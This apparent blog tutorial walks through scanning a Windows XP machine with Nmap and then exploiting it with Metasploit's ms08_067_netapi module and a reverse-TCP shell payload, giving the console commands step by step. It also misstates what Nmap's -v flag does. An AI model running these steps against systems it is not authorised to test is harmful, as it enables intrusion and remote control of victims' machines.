How to use Metasploit & Nmap

In this blog I will tell you how to use Metasploit and Nmap. Throughout the blog I will use Backtrack you can use any OS just download metasploit framework and nmap for that OS and install them.

First we need to understand basic terms

Vulnerability => a weakness which allows an attacker to break into/compromise a system`s security.

Exploit – code which allows an attacker to take advantage of a vulnerable system.

Payload- actual code which run on the system after exploitation.

How does this work?

First attacker find a vulnerability in victim system and then use that vulnerability to gain access in system using exploits once attacker has entered then he run payload in the system to complete task which can be anything like erasing/downloading/uploading files or adding users etc, gaining access to cmd etc.

First we will do a ping to victim to check weather it is up or not.

To find vulnerability we will use nmap(You can use nessus or any other tools if you want)

Step 1:- Scan using nmap.

                You can use either cli or Gui(Zenmap) method for that

                To search in cli put query "nmap –v –A [host ip]"

                                Eg. Nmap –v –A 192.168.1.1

                -A is used for advance scanning this will give you information about OS and many mote thing.

                -v is used for port scanning

              

See the ports open in victim system that will decide which exploit we will use for attacking.

It will show you result like this. In this example we will be using Windows XP machine as a victim PC.

Step 2:- start Metasploit

                If you are starting it first time then I suggest you to update it using command “msfupdate”.

               Once you update it you can start it using “msfconsole” command.

After start it will show you prompt like this……

Now we will use some exploit (I will use only 1 exploit in this blog but I suggest you to learn about other exploit also)

Just give command "use [address and name of exploit]"

eg. “use exploit/windows/smb/ms08_067_netapi"

Now use “show options” command to see available options in the exploit.

 

Payload cab be set by command "set payload [address & name of payload]"
               eg. “set payload windows/shell/reverse_tcp” (this Payload will give you access to command prompt of victim’s System)

Now use “show options” command to see available options in the exploit and payload.

Green circle in the above image are required field for the exploit and payload to run successfully.

Rhost is the ip address of victim’s system and Lhost is the ip address of your system.

Rhost and Lhost can be set by command “set rhost [host ip add]” & by “set lhost [your ip add]”  

After giving all options you can verify them by command “show options”

 To run the exploit you have to give command “exploit” and it will attack.

 This blog is for education purpose only. Hope it will be useful for any query you can ask?